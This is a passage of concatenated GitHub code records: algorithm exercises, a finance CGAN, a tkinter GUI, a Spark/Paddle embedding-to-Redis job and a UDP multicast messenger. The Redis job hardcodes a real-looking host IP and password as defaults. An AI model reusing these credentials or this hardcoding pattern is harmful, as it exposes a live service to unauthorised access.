visited[cases[i][1]]:\n if i == 0:\n queue.appendleft((cases[i][0],cases[i][1]))\n else:\n queue.append((cases[i][0],cases[i][1]))\n\nprint(result)","repo_name":"bottle-honey/baekjoon","sub_path":"BFS/13549.py","file_name":"13549.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11951283931","text":"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jul 15 10:58:15 2019\r\n\r\n@author: rochej\r\n\"\"\"\r\n'CGAN avec une condition non categrical: liste: paper 1 avec scaling zscore'\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport statsmodels\r\nimport statsmodels.api as sm\r\n\r\nimport keras.backend as K\r\n\r\nfrom keras.datasets import mnist\r\nfrom keras.layers.merge import _Merge\r\nfrom keras.layers import Input, Dense, Reshape, Flatten, Dropout, LSTM, multiply, concatenate\r\nfrom keras.layers import BatchNormalization, Activation, ZeroPadding2D, Embedding\r\nfrom keras.layers.advanced_activations import LeakyReLU\r\nfrom keras.layers.convolutional import Conv1D,UpSampling1D\r\nfrom keras.models import Sequential, Model\r\nfrom keras.optimizers import RMSprop\r\nfrom functools import partial\r\n\r\nfrom scipy import stats\r\n\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n#parametre\r\nz_size=100\r\nlabel_size=1\r\nn_critic = 5\r\n\r\nepoch=20\r\noptimizer = RMSprop(lr=0.00005)\r\n\r\n\r\n\r\n\r\n#num_classes=43\r\n\r\n\r\n#lecture data\r\nret_data_ini = pd.read_csv(filepath_or_buffer=\"ret_data.csv\")\r\n\r\ndf=pd.read_excel('VIX.xlsx',index_col='Date')\r\ndft=df.T\r\ndf_vol=df['VIX']\r\ndf_sp=df['SPX 500']\r\n\r\ndef get_return(Y):\r\n R = Y.pct_change()[1:]\r\n return(R)\r\n \r\ndef get_norm(data):\r\n mu=data.mean()\r\n sig=data.std()\r\n return((data-mu)/sig)\r\n \r\n\r\ndef split(X,w,roll_w,label_w):\r\n \r\n Xn=X.copy()\r\n Xn=np.array(Xn)\r\n \r\n label=[]\r\n L=[]\r\n for k in range(label_w,len(X),roll_w):\r\n if k+w num_train - batch_size:\r\n# start = 0\r\n# if e % 10 == 0:\r\n## print(d_loss[-1],d_loss[0],d_loss[1])\r\n# print(e)\r\n## print('epoch: {}; D loss: {:.4}; G_loss: {:.4}'.format(e, d_loss[-1], g_loss))\r\n \r\n \r\n \r\ndef train(X):\r\n num_train = X.shape[0]\r\n start = label_w\r\n E=[]\r\n\r\n# label associé nécessaire pour le calcul de la cross entropy\r\n valid = np.ones((batch_size, 1))\r\n fake = np.zeros((batch_size, 1))\r\n\r\n for e in range(epoch):\r\n for _ in range(n_critic):\r\n stop = start + batch_size\r\n real_batch = X[start:stop]\r\n label_batch=[]\r\n for k in range(start,stop):\r\n label=X[k-label_w:k] #fenetre des n jours precedents\r\n label_batch.append(label)\r\n label_batch=np.array(label_batch)\r\n \r\n real_batch=np.array(real_batch)\r\n label_batch=np.array(label_batch)\r\n label_batch=label_batch.reshape(batch_size,label_w)\r\n\r\n \r\n real_batch=real_batch.reshape((real_batch.shape[0],real_batch.shape[1]))\r\n noise =np.random.normal(0, 0.5, size=(batch_size, z_size))\r\n\r\n \r\n d_loss_real = discriminator.train_on_batch([real_batch, label_batch], valid) #input: real data\r\n gen_imgs = generator.predict([noise, label_batch])\r\n d_loss_fake = discriminator.train_on_batch([gen_imgs, label_batch], fake) #input: fake data\r\n## \r\n d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)\r\n## \r\n g_loss = combined.train_on_batch([noise, label_batch], valid)\r\n start += batch_size\r\n if start > num_train - batch_size:\r\n start = label_w\r\n if e % 10 == 0:\r\n# print(d_loss[-1],d_loss[0],d_loss[1])\r\n E.append(d_loss)\r\n print('d_loss_tot=',d_loss)\r\n print('fake=',d_loss_fake)\r\n print('real=',d_loss_real)\r\n print(e)\r\n \r\n# if e % 400 == 0 and e>0:\r\n# label_t=label_r[0].reshape(-1,1)\r\n# n_gene=1\r\n# noise_t =np.random.normal(0, 0.1, size=(n_gene,z_size))\r\n##noise_t=np.array([1 for i in range(100)]).reshape(1,100)\r\n##noise_t=ret_real.iloc[:100]\r\n##noise_t=np.array(noise_t).reshape(1,len(noise_t))\r\n#\r\n# ret_gene=generator.predict([noise_t,label_t])\r\n# ret_gene=pd.DataFrame(ret_gene).T\r\n# price_gene=get_price(ret_gene,label_t)\r\n# plt.plot(price_gene,label=str(e))\r\n \r\n \r\n\r\n'modele simple'\r\ndiscriminator =build_discriminator()\r\n#discriminator.compile(loss=['binary_crossentropy'], optimizer=optimizer, metrics=['accuracy'])\r\ndiscriminator.compile(loss=['binary_crossentropy'], optimizer=optimizer)\r\ngenerator = build_generator()\r\n##\r\nlabel = Input(shape=(label_size,))\r\nnoise = Input(shape=(z_size, ))\r\n##\r\nnoise_gen = generator([noise,label])\r\n#noise_gene_r=Reshape((1,1))(noise_gen)\r\n#label_r=Reshape((1,250))(label)\r\n\r\n\r\n##\r\ndiscriminator.trainable = False\r\n##\r\nvalid = discriminator([noise_gen, label])\r\ncombined = Model([noise, label], valid)\r\ncombined.compile(loss=['binary_crossentropy'],optimizer=optimizer)\r\n\r\nprint('ok')\r\n#train(ret_data,label_r)\r\n\r\n'model de Wassertein'\r\n#generator=build_generator()\r\n#discriminator=build_discriminator()\r\n#\r\n#\r\n#\r\n##def du label\r\n#label = Input(shape=(1,))\r\n#\r\n##graph de generateur\r\n#\r\n#discriminator.trainable = False\r\n#generator.trainable = True\r\n# \r\n#noise_gen = Input(shape=(z_size, ))\r\n#\r\n#\r\n#noise_data = generator([noise_gen,label])\r\n#valid = discriminator([noise_data,label])\r\n#\r\n#generator_model = Model([noise_gen,label], valid)\r\n#generator_model.compile(loss=wasserstein_loss, optimizer=optimizer)\r\n#\r\n#\r\n#\r\n#\r\n##graph du discirminateur\r\n#\r\n#generator.trainable = False\r\n#\r\n#real_data = Input(shape=(ret_data.shape[1],1))\r\n#noise = Input(shape=(z_size,))\r\n#fake_data = generator([noise,label])\r\n#\r\n#fake = discriminator([fake_data,label])\r\n#valid = discriminator([real_data,label])\r\n##\r\n#discriminator_model = Model(inputs=[real_data, noise,label], outputs=[valid, fake])\r\n#discriminator_model.compile(loss=[wasserstein_loss, wasserstein_loss], optimizer=optimizer, loss_weights=[1, 1])\r\n#\r\n#\r\n# \r\n\r\nepoch=1000\r\ntrain(ret_data)\r\n# \r\n#\r\n##ret_real=get_return(df_vol)\r\n#ret=cumreturn(get_return(df_sp))\r\n##\r\ndef generate_serie():\r\n R=[]\r\n# noise_t =np.random.normal(0, 1, size=(n_gene,z_size))\r\n for k in range(label_w,len(ret_data)):\r\n \r\n label_t=ret_data[k-label_w:k]\r\n label_t=label_t.reshape(1,len(label_t))\r\n\r\n n_gene=1\r\n noise_t =np.random.normal(0.5, 0.5, size=(n_gene,z_size))\r\n # noise_t =np.random.normal(0, 0.01, size=(n_gene,z_size))\r\n ##noise_t=np.array([1 for i in range(100)]).reshape(1,100)\r\n ##noise_t=ret_real.iloc[:100]\r\n ##noise_t=np.array(noise_t).reshape(1,len(noise_t))\r\n #\r\n ret_gene=generator.predict([noise_t,label_t])\r\n # ret_gene=pd.DataFrame(ret_gene).T\r\n R.append(float(ret_gene))\r\n \r\n R=pd.DataFrame(R) #R: output du generateur\r\n R_real=pd.DataFrame(ret_data[label_w:]) #rett_data: zscore des return du SPX\r\n \r\n ret_gene_brut=R #output brut \r\n ret_gene=R*sig_data+m_data #rescaling pour obtenir des data reels: dezcscorise avec les données des data reel\r\n ret_real=R_real*sig_data+m_data #de-zscorise ret_data: get the real cumreturn\r\n \r\n plt.figure(1)\r\n plt.plot(cumreturn(ret_gene),label='cumreturn gene')\r\n plt.plot(cumreturn(ret_real),label='cumreturn reel') \r\n plt.legend() \r\n\r\n plt.figure(2)\r\n plt.plot(zscore(cumreturn(ret_gene)),label='z_s(cumreturn gene)')\r\n plt.plot(zscore(cumreturn(ret_real)),label='z_s(cumreturn reel)') \r\n plt.legend() \r\n \r\n plt.figure(3)\r\n plt.plot(ret_gene,label='return gene')\r\n plt.plot(ret_real,label='return real')\r\n plt.legend()\r\n \r\n plt.figure(4)\r\n plt.plot(ret_gene_brut,label='return gene brut')\r\n plt.plot(R_real,label='ret_data')\r\n plt.legend()\r\n \r\n plt.figure(5)\r\n plt.plot(cumreturn(R),label='output brut')\r\n\r\n \r\n \r\ngenerate_serie()\r\n\r\n\r\ndef simulate_data(n_sim):\r\n for k in range(n_sim):\r\n data=generate_serie()\r\n data_gene=data[1]\r\n data_reel=data[0]\r\n print(k)\r\n plt.plot(data_gene,label='gene_nn')\r\n plt.plot(data_reel,label='reel')\r\n plt.legend()\r\n \r\n#simulate_data(1) \r\n\r\ndef simulate_mean_data(n_sim):\r\n L=[]\r\n for k in range(n_sim):\r\n data=generate_serie()\r\n data_gene=data[1]\r\n data_reel=data[0]\r\n L.append(data_gene)\r\n X=pd.concat([L[i] for i in range(len(L))],axis=1)\r\n X_mean=X.mean(axis=1)\r\n plt.plot(X_mean,label='gene') \r\n plt.plot(data_reel,label='reel')\r\n plt.legend()\r\n \r\n#simulate_mean_data(10)\r\n\r\n\r\n#plt.plot(price_gene,label='gene')\r\n#plt.plot(price_real,label='real')\r\n#plt.legend()\r\n\r\n#plt.figure(1)\r\n#plt.plot(R,label='gene')\r\n#plt.legend()\r\n#\r\n#plt.figure(2)\r\n#plt.plot(R_real,label='real')\r\n#plt.legend()\r\n\r\n###\r\n#price_real=data_vol.iloc[0]\r\n##\r\n#plt.figure(3)\r\n#plt.plot(price_gene,label='gene')\r\n#plt.plot(price_real,label='reel')\r\n#plt.legend()\r\n\r\n#R_new=R-R.mean()\r\n#prix_new=get_price(R_new,1).iloc[:500]\r\n#plt.plot(prix_new,label='ge')\r\n#plt.plot(price_real,label='real')\r\n\r\n#plt.figure(4)\r\n#plt.plot(R,label='gene')\r\n#plt.plot(R_real,label='real')\r\n#plt.legend()\r\n\r\n\r\n\r\ndef get_correlation(x,y,start,end):\r\n s1=x.iloc[start:end]\r\n s2=y.iloc[start:end]\r\n\r\n return(s1.corr(s2,method='pearson'))\r\n \r\ndef get_mean_corr(x,y,roll_w):\r\n R=[]\r\n for start in range(0,len(x),5):\r\n if start+roll_w > len(x):\r\n rho=get_correlation(x,y,start,len(x))\r\n R.append(rho)\r\n else:\r\n rho=get_correlation(x,y,start,start+roll_w)\r\n R.append(rho)\r\n corr_m=sum([rho for rho in R])\r\n print(corr_m)\r\n \r\n \r\n#X=mean_generate('Apple',10)\r\n \r\n \r\n \r\ndef KS_test(X,Y,alpha=0.1):\r\n x=np.array(X)\r\n y=np.array(Y)\r\n test=stats.ks_2samp(x, y)\r\n p_value=test[1]\r\n if p_value\", lambda event: self.imageClick(event.x, event.y))\n\t\tself.iPanel.grid(row=0,column=0)\n\n\tdef initUserPanel(self):\n\t\tself.pref_frame = tk.Frame(self.root, bg=\"#686aa8\")\n\t\tself.pref_frame.grid(row=0, column=1)\n\t\tself.new_button = tk.Button(self.pref_frame, text=\"Upload New Room\", command=self.newRoom)\n\t\tself.new_button.grid(row=1, column=0)\n\t\tself.save_button = tk.Button(self.pref_frame, text=\"Save this Room\", command=self.saveRecs)\n\t\tself.save_button.grid(row=1, column=1)\n\t\ttk.Label(self.pref_frame, bg=\"#686aa8\", text=\"Enter budget: \").grid(row=2, column=0)\n\t\tself.budget_entry = tk.Entry(self.pref_frame)\n\t\tself.budget_entry.grid(row=2, column=1)\n\n\t\ttk.Label(self.pref_frame, bg=\"#686aa8\", text=\"Pick a Style: \").grid(row=3, column=0)\n\t\tself.style_var = tk.StringVar()\n\t\tself.style_var.set('modern')\n\t\tself.style_menu = tk.OptionMenu(self.pref_frame, self.style_var, *self.UP.styles)\n\t\tself.style_menu.grid(row=3, column=1)\n\n\t\tself.pref_button = tk.Button(self.pref_frame, text=\"Update Preferences\", command=self.updateUser)\n\t\tself.pref_button.grid(row=5, column=0, columnspan=2)\n\t\tself.dirPanel = tk.Label(self.pref_frame, bg=\"#686aa8\", text=\"Click somewhere to add an object! \\n Click on an object to customize it! \\n \" + \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \"To save your room with links, click 'Save this Room'! \\n Don't forget to keep a budget! \\n\")\n\t\tself.dirPanel.grid(row=10, column=0, columnspan=2)\n\t\tself.quit_button = tk.Button(self.pref_frame, text=\"QUIT\", fg=\"red\",command=quit)\n\t\tself.quit_button.grid(row=11,column=0, columnspan=2)\n\n\n\tdef initResultsPanel(self):\n\t\tself.res_frame = tk.Frame(self.root, bg=\"#686aa8\")\n\t\tself.res_frame.grid(row=1, column=0)\n\n\tdef run(self):\n\t\tself.root.mainloop()\n\t\tprint('bye')\n\n\tdef saveRecs(self):\n\t\tif self.RR == None:\n\t\t\tmessagebox.showinfo(\"Invalid Request\", \"You must upload a room before trying to save one!\")\n\t\telse:\n\t\t\twith open(\"room.txt\", \"w\") as f:\n\t\t\t\tfor r in self.RR.recs:\n\t\t\t\t\tf.write(\"\\n\")\n\t\t\t\t\tf.write(str(r.name) + \", \" + str(r.price) + \"\\n\" + str(r.url))\n\n\tdef newRoom(self):\n\t\tfilename = askopenfilename()\n\t\timage = Image.open(filename)\n\t\timage = self.fitToDisplay(image, 600, 600)\n\t\timage_tk = ImageTk.PhotoImage(image)\n\t\tself.drawImageOnLabel(image_tk, self.iPanel, lambda label: label.grid(row=0, column=0))\n\t\tmessagebox.showinfo(\"Hello!\", \"Your room is being processed ... stay tuned!\")\n\t\tself.initRoomReader(filename)\n\t\tif len(self.RR.pois) > 0: self.drawImageOnLabel(self.image, self.iPanel, lambda label: label.grid(row=0, column=0))\n\n\tdef initRoomReader(self, fname):\n\t\tself.RR = room_reader.RoomReader(fname)\n\t\tself.RR.findPOIs()\n\t\tif len(self.RR.pois) < 1: \n\t\t\tmessagebox.showinfo(\"DROOM Speaking\", \"Hmmm... we're not quite sure what you want. Click somewhere to get started!\")\n\t\telse:\n\t\t\tself.RR.getRecommendations(self.UP)\n\t\t\tself.image = self.RR.getDisplayImage()\n\t\t\tself.RR.updateRecs()\n\t\t\tself.addResults(self.RR.recs)\n\n\tdef addResults(self, recs):\n\t\tself.removeOldRecs()\n\t\tresnum = len(recs)# if len(recs) < 3 else 3\n\t\tfor n in range(resnum):\n\t\t\tframe = tk.Frame(self.res_frame, bg=\"#686aa8\", bd=10)\n\t\t\tframe.grid(row=0, column=n)\n\t\t\timage_tk = ImageTk.PhotoImage(Image.fromarray(recs[n].getRGBImage()).resize((100, 100), Image.ANTIALIAS))\n\t\t\tt = recs[n].name if len(recs[n].name) <= 20 else str(recs[n].name[:17] + \"...\")\n\t\t\ttext = tk.Label(frame, text=t)\n\t\t\tprice = tk.Label(frame, text='${:,.2f}'.format(recs[n].price))\n\t\t\ttext.grid(row=0, column=0)\n\t\t\tprice.grid(row=1, column=0)\n\t\t\tself.drawImageOnLabel(image_tk, tk.Label(frame), lambda label: label.grid(row=2, column=0))\n\n\tdef drawImageOnLabel(self, image, label, grid_func):\n\t\tlabel.configure(image = image)\n\t\tlabel.image = image\n\t\tgrid_func(label)\n\n\tdef imageClick(self, x, y):\n\t\tp = self.RR.poiClicked(x, y)\n\t\tif p != None:\n\t\t\tself.getPOIOptions(p, x, y)\n\t\telse:\n\t\t\tmessagebox.showinfo(\"DROOM Speaking\", \"Looks like you want to make your room dreamier ... \\n We'll be right back with suggestions!\")\n\t\t\tself.RR.drawPoint(x, y)\n\t\t\tself.image = self.RR.getDisplayImage()\n\t\t\tself.drawImageOnLabel(self.image, self.iPanel, lambda label: label.grid(row=0, column=0))\n\t\t\tself.RR.addPOI(x, y, self.UP.style, self.UP.budget)\n\t\t\tself.image = self.RR.getDisplayImage()\n\t\t\tself.drawImageOnLabel(self.image, self.iPanel, lambda label: label.grid(row=0, column=0))\n\t\t\tself.RR.updateRecs()\n\t\t\tself.addResults(self.RR.recs)\n\t\n\tdef getPOIOptions(self, p, x, y):\n\n\t\tarea_var = tk.StringVar()\n\t\tprod_var = tk.StringVar()\n\t\ttype_var = tk.StringVar()\n\t\tfur_var = tk.StringVar()\n\n\t\ttl = tk.Toplevel()\n\t\ttk.Label(tl, bg=\"#686aa8\", text=\"Choose a room area: \").grid(row=1, column=0)\n\t\tarea_var.set(p.area)\n\t\tarea_menu = tk.OptionMenu(tl, area_var, *self.UP.areas)\n\t\tarea_menu.grid(row=1, column=1)\t\n\n\n\t\ttk.Label(tl, bg=\"#686aa8\", text=\"Choose a product style: \").grid(row=3, column=0)\n\t\ttype_var.set('')\n\t\ttype_menu = tk.OptionMenu(tl, type_var, *self.UP.types)\n\t\ttype_menu.grid(row=3, column=1)\t\n\n\t\tif p.product == 'furniture':\n\t\t\ttk.Label(tl, bg=\"#686aa8\", text=\"Choose a furniture type: \").grid(row=4, column=0)\n\t\t\tfur_var.set(p.product)\n\t\t\tfur_menu = tk.OptionMenu(tl, fur_var, *self.UP.furnitures)\n\t\t\tfur_menu.grid(row=4, column=1)\n\t\telse:\t\n\t\t\ttk.Label(tl, bg=\"#686aa8\", text=\"Choose a product type: \").grid(row=2, column=0)\n\t\t\tprod_var.set('')\n\t\t\tprod_menu = tk.OptionMenu(tl, prod_var, *self.UP.objects)\n\t\t\tprod_menu.grid(row=2, column=1)\t\n\n\n\t\tdef removePOI():\n\t\t\tself.RR.removePOI(p.id)\n\t\t\ttl.destroy()\n\t\t\tself.image = self.RR.getDisplayImage()\n\t\t\tself.drawImageOnLabel(self.image, self.iPanel, lambda label: label.grid(row=0, column=0))\n\t\t\tself.RR.updateRecs()\n\t\t\tself.addResults(self.RR.recs)\n\n\t\tdef addPrefs(p = p, a = area_var, prod = prod_var, t = type_var, f = fur_var):\n\t\t\tp.area, p.product, p.prod_type, p.fur = a.get(), prod.get(), t.get(), f.get()\n\t\t\tself.RR.updatePOI(p, self.UP.style, self.UP.budget)\n\t\t\tself.image = self.RR.getDisplayImage()\n\t\t\tself.drawImageOnLabel(self.image, self.iPanel, lambda label: label.grid(row=0, column=0))\n\t\t\tself.RR.updateRecs()\n\t\t\tself.addResults(self.RR.recs)\n\n\t\tdef close(top=tl):\n\t\t\taddPrefs()\n\t\t\ttl.destroy()\n\n\t\tremove_poi_button = tk.Button(tl, text=\"I don't want this :(\", command=removePOI)\n\t\tremove_poi_button.grid(row=10, column=0, columnspan=2)\n\n\t\tdestroy_button = tk.Button(tl, text=\"find something new!\", fg=\"red\",command=close)\n\t\tdestroy_button.grid(row=11,column=0, columnspan=2)\n\n\n\tdef fitToDisplay(self, image, w, h):\n\t\ti_w, i_h = image.size[1], image.size[0]\n\t\tratio = min( w/i_w, h/i_h)\n\t\treturn image.resize((int(i_h * ratio), int(i_w * ratio)), Image.ANTIALIAS)\n\n\n\tdef updateUser(self):\n\t\tself.UP.setBudget(self.budget_entry.get())\n\t\tself.UP.setStyle(self.style_var.get())\n\t\tmessagebox.showinfo(\"Update\", \"Your preferences have been updated! \\n We'll be back with fresh finds in a bit!\")\n\t\tself.RR.getRecommendations(self.UP)\n\t\tself.image = self.RR.getDisplayImage()\n\t\tself.drawImageOnLabel(self.image, self.iPanel, lambda label: label.grid(row=0, column=0))\n\t\tself.RR.updateRecs()\n\t\tself.removeOldRecs()\n\t\tself.addResults(self.RR.recs)\n\n\n\tdef removeOldRecs(self):\n\t\tfor w in self.res_frame.winfo_children():\n\t\t\tw.destroy()\n\n\tdef saveRoom(self):\n\t\tpass\n\ndef main():\n\tapp = GUI()\n\tapp.run()\n\nmain()","repo_name":"arushibandi/droom","sub_path":"final tp/src/main_final.py","file_name":"main_final.py","file_ext":"py","file_size_in_byte":8206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35341272490","text":"import random\n\nedad = random.randint(1, 100)\ndia_semana = random.randint(1, 7)\nhora_pelicula = random.randint(13, 21)\n\nprint(\"El dia de semana es: \", dia_semana)\nprint(\"La edad es: \", edad)\nprint(\"La hora de la pelicula es: \", hora_pelicula)\n\nif dia_semana == 1:\n print(\"Lunes popular, el descuento es del 50%\")\n descuento = 50\nelse:\n if edad >= 60:\n print(\"Es un adulto mayor, su descuento es del 50%\")\n descuento = 50\n else:\n if edad <= 10 and hora_pelicula < 17:\n print(\"Es un nino, le toca un descuento del 50\")\n descuento = 50\n else:\n descuento = 0\n\nprint(\"El descuento final es del: \", descuento, \"%\")\n","repo_name":"ljtrevizon/Logica-de-Programacion-en-Python","sub_path":"Nivel 2/ejemplo11_1.py","file_name":"ejemplo11_1.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35370803305","text":"#-*- coding: utf-8 -*-\nimport os\nos.environ['JAVA_HOME']='/opt/Bigdata/client/JDK/jdk1.8.0_272'\nos.environ['SPARK_HOME']='/opt/Bigdata/client/Spark2x/spark'\nos.system(\"source /opt/Bigdata/client/bigdata_env\")\nos.system(\"/opt/Bigdata/client/KrbClient/kerberos/bin/kinit -kt /workspace/gpsearch.keytab GPSearch\")\nos.system(\"source /opt/Bigdata/client/Hudi/component_env\")\n#export HADOOP_USER_NAME=hive\n#os.environ['HADOOP_USER_NAME']='hive'\nimport findspark\nfindspark.init()\nimport sys\n# --jars hdfs:///user/lisensen/tools/jpmml-sparkml-executable-1.5.13.jar\n# pyspark_submit_args = ' --executor-memory 2g --driver-memory 8g --executor-cores 2 --num-executors 30 --conf spark.shuffle.spill.numElementsForceSpillThreshold=2000000 --conf spark.memory.storageFraction=0.2 --conf spark.dlism=2000 --conf spark.sql.shuffle.partitions=2000 --conf spark.dynamicAllocation.enabled=false --conf spark.port.maxRetries=100 --conf spark.driver.maxResultSize=8g' + ' pyspark-shell'\npyspark_submit_args = ' --master local[*] --driver-memory 16g --executor-cores 1 --conf spark.driver.extraJavaOptions=\" -Xss16384k\" --conf spark.driver.memoryOverhead=4g --conf spark.local.dir=/opt/home/lisensen/temp --conf spark.shuffle.memoryFraction=0.1 --conf spark.kryoserializer.buffer.max=1800m' + ' pyspark-shell'\nos.environ[\"PYSPARK_SUBMIT_ARGS\"] = pyspark_submit_args\nos.environ['HADOOP_USER_NAME']='hdfs'\n#import findspark\n#findspark.init()\nimport argparse\nimport os\nimport sys\nfrom pyspark import StorageLevel\nfrom pyspark import SparkConf, SparkContext\nfrom pyspark.sql import HiveContext,SQLContext,Row,SparkSession\nfrom pyspark.sql.types import *\nimport pyspark.sql.functions as F\nfrom pyspark.sql.functions import udf,col,column\nimport pyspark.sql.types as typ\nfrom pyspark.sql.types import StructType\nfrom pyspark.sql.types import StructField\nfrom pyspark.sql.types import StringType, IntegerType\nimport jieba\nimport os\nimport pandas as pd\nfrom pyhive import hive\nimport re\nimport faiss\nimport mkl\nimport numpy as np\nimport argparse\nimport json\nimport redis\nimport paddle\nimport paddle.nn.functional as F\nimport paddlenlp as ppnlp\nfrom paddlenlp.data import Stack, Tuple, Pad\nfrom model import BertMetric\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--params_path\", type=str, default='./model_state.pdparams',\n help=\"The path to model parameters to be loaded.\")\nparser.add_argument(\"--max_seq_length\", default=50, type=int,\n help=\"The maximum total input sequence length after tokenization. \"\n \"Sequences longer than this will be truncated, sequences shorter will be padded.\")\nparser.add_argument(\"--batch_size\", default=32, type=int, help=\"Batch size per GPU/CPU for training.\")\nparser.add_argument('--device', choices=['cpu', 'gpu'], default=\"cpu\",\n help=\"Select which device to train model, defaults to gpu.\")\nparser.add_argument('--emb_size', type=int, default=1024, help=\"embedding dims\")\nparser.add_argument('--cls_size', type=int, default=31, help=\"total class nums\")\nparser.add_argument(\"--redis_host\", type=str, default='10.255.24.40')\nparser.add_argument(\"--redis_password\", type=str, default='S4wKxoLGRo')\nparser.add_argument(\"--redis_port\", type=int, default=6379)\nparser.add_argument(\"--redis_db\", type=int, default=14)\nparser.add_argument(\"--exp_seconds\", type=int, default=7*24*3600)\nargs = parser.parse_args()\n\nremove_words = ['【福利秒杀】','【每日福利】','【福利爆款】','【专柜品质】','【1元秒杀】','【直播专用1元秒杀】','【','】','源本']\n\ndef remove(x):\n for r in remove_words:\n x = x.replace(r, '')\n x = x.strip()\n return x\n\ndef convert_example(query, tokenizer, max_seq_length=512, is_test=False):\n #print(query)\n query_encoded_inputs = tokenizer(query, max_seq_len=max_seq_length)\n query_input_ids = query_encoded_inputs[\"input_ids\"]\n query_token_type_ids = query_encoded_inputs[\"token_type_ids\"]\n #return query_input_ids, query_token_type_ids\n return paddle.to_tensor([query_input_ids], dtype=paddle.int64), \\\n paddle.to_tensor([query_token_type_ids], dtype=paddle.int64)\n\nif __name__ == '__main__':\n sparkConf = SparkConf()\n sparkConf.set(\"spark.app.name\", \"deep_emb_infer\").set(\"spark.ui.port\", \"4060\")\n spark = SparkSession.builder.config(conf=sparkConf).enableHiveSupport().getOrCreate()\n sc = spark.sparkContext\n\n pd_spu = spark.sql(\"\"\"\n select distinct spu_sn, spu_name\n from dm_recommend.dws_recommend_dj_frxs_skusn_details_di \n where status = 'UP'\n \"\"\").toPandas()\n\n pd_spu['spu_name'] = pd_spu['spu_name'].apply(lambda x:remove(x))\n print(\"pd_spu cnt : {}\".format(len(pd_spu)),flush=True)\n\n paddle.set_device(args.device)\n pretrained_model = ppnlp.transformers.RobertaModel.from_pretrained('roberta-wwm-ext-large')\n tokenizer = ppnlp.transformers.RobertaTokenizer.from_pretrained('roberta-wwm-ext-large')\n\n print(\"loading model...\",flush=True)\n model = BertMetric(pretrained_model, args.emb_size, args.cls_size)\n if args.params_path and os.path.isfile(args.params_path):\n state_dict = paddle.load(args.params_path)\n model.set_dict(state_dict)\n print(\"Loaded parameters from %s\" % args.params_path)\n\n model.eval()\n sentences = pd_spu['spu_name'].values\n print(\"model input data size : {}\".format(len(sentences)), flush=True)\n vec_result = []\n for s in sentences:\n query_input_ids, query_token_type_ids = convert_example(s, tokenizer, max_seq_length=args.max_seq_length, is_test=True)\n vec_out = model.predict_emb(query_input_ids, query_token_type_ids)\n vec_result.append(vec_out[0])\n print(\"model output data size : {}\".format(len(vec_result)), flush=True)\n\n mkl.get_max_threads()\n d = 1024\n index = faiss.IndexFlatL2(d) # build the index\n #print(index.is_trained) # 表示索引是否需要训练的布尔值\n index.add(np.array(vec_result)) # add vectors to the index\n #print(index.ntotal)\n D, I = index.search(np.array(vec_result), 13) # actual search\n print(\"emb similar output cnt : {}\".format(len(I)),flush=True)\n pool = redis.ConnectionPool(host=args.redis_host, port=args.redis_port, password=args.redis_password, db=args.redis_db)\n #print(\"redis: {}:{} {} {}\".format(args.redis_host, args.redis_port, args.redis_password, args.redis_db),flush=True)\n r = redis.Redis(connection_pool=pool)\n pipe = r.pipeline() # 创建一个管道\n for i in range(0, len(I)):\n curr_spusn = pd_spu.spu_sn.values[i]\n curr_spusn_similar_str = ''\n for similar_index in I[i][1:]:\n curr_spusn_similar_str += pd_spu.spu_sn.values[similar_index] + ','\n curr_spusn_similar_str = curr_spusn_similar_str.strip(',')\n pipe.set('dj_similar:{}'.format(curr_spusn), curr_spusn_similar_str)\n pipe.expire('dj_similar:{}'.format(curr_spusn) , args.exp_seconds)\n pipe.execute()\n sc.stop()\n","repo_name":"forrestsocool/bertMetric","sub_path":"deep_emb_infer.py","file_name":"deep_emb_infer.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32974403359","text":"import numpy as np\na = np.array ([[1,2,3],[1,2,3],[3,2,1]])\nb = np.array ([[5,6,7],[5,2,7],[7,6,8]])\nc= a+b\nd= a-b\ne= np.matmul (a,b)\nq = np.matmul (a,np.linalg.inv(b))\nprint (c)\nprint (d)\nprint (e)\nprint (q)\n","repo_name":"ZLozZ/PYTHON","sub_path":"B6_nop/B1.py","file_name":"B1.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39963179376","text":"import os\nimport subprocess\nimport socket\n\ndef send(message):\n\tANY = '0.0.0.0'\n\tSENDERPORT=1501\n\tMCAST_ADDR = '224.168.2.9'\n\tMCAST_PORT = 8946\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n\tsock.bind((ANY,SENDERPORT))\n\tsock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)\n\n\t#Send 50 times as a temporary fix until TCP is put in\n\tloop = 0\n\n\twhile loop <= 50:\n\t\tsock.sendto(message, (MCAST_ADDR,MCAST_PORT) )\n\t\tloop += 1\n\tsock.close()\n\nsender = subprocess.check_output('echo %username%', shell=True)\nsender = sender.rstrip()\ntarget = subprocess.check_output('cscript textbox.vbs \"WiN\" \"Recipient:\"', shell=True)\ntarget = target.split('\\n')\ntarget = target[3].rstrip('\\r\\n')\nif target == \"\":\n\tsys.exit()\n\nmessage = subprocess.check_output('cscript textbox.vbs \"WiN\" \"Message:\"', shell=True)\nmessage = message.split('\\n')\nmessage = message[3].rstrip('\\r\\n')\nif message == \"\":\n\tsys.exit()\n\n#Messages are encoded like so \"senderProgramVx.x##target##sender##message\"\n#Example: \"linuxV1.8##person87##NickGeek##Hey mate! What do you think of this WiN thing?\"\nformattedMessage = \"windowsV0.1##\"+target+\"##\"+sender+\"##\"+message\n\n#Send 